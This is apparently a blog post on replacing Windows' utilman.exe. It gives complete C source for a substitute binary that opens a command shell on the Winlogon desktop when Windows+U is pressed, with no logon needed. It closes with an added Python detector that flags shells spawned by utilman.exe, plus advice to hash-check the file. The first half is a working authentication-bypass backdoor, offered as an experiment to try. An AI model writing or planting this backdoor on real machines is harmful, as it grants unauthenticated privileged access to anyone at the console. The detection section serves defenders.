Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h>
#include <windows.h>
#include <tchar.h>

int _tmain(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    /* CreateProcess may modify the command line, so pass writable copies */
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

    ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;   /* start the new process on the Winlogon desktop */
    ZeroMemory(&p, sizeof(p));

    /* Only close the handles if the process was actually created */
    if (CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p))
    {
        CloseHandle(p.hProcess);
        CloseHandle(p.hThread);
    }
    return 0;
}
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
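From the defender's side, the experiment above leaves a recognisable trace: a command interpreter whose parent is utilman.exe. The following is an added example, not part of the original post, that walks process-creation records and flags such shells; the field names (pid, ppid, image), the list of interpreters and the sample events are constructed assumptions, not the format of any particular logging product.

```python
import ntpath

# Assumption: interpreters worth alerting on; extend for your environment.
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample process-creation events (hypothetical field names).
SAMPLE_EVENTS = [
    {"pid": 600,  "ppid": 4,    "image": r"C:\Windows\System32\winlogon.exe"},
    {"pid": 812,  "ppid": 600,  "image": r"C:\Windows\System32\utilman.exe"},
    {"pid": 900,  "ppid": 812,  "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 950,  "ppid": 900,  "image": r"C:\Windows\System32\net.exe"},
    # A second utilman.exe (mixed case) that only starts the on-screen keyboard.
    {"pid": 1200, "ppid": 600,  "image": r"C:\Windows\System32\Utilman.exe"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\osk.exe"},
    # An ordinary shell whose parent was never logged.
    {"pid": 2000, "ppid": 1500, "image": r"C:\Windows\System32\cmd.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def find_utilman_shells(events):
    """Return the shell events that have utilman.exe among their ancestors."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        seen = set()  # guards against loops caused by pid reuse in the log
        parent = by_pid.get(e["ppid"])
        while parent and parent["pid"] not in seen:
            seen.add(parent["pid"])
            if basename(parent["image"]) == "utilman.exe":
                hits.append(e)
                break
            parent = by_pid.get(parent["ppid"])
    return hits


if __name__ == "__main__":
    for hit in find_utilman_shells(SAMPLE_EVENTS):
        print("ALERT: shell descended from utilman.exe:", hit)
```

Matching on the parent name alone does not tell you whether the file in system32 was replaced, so pair an alert like this with a signature or hash check of utilman.exe itself.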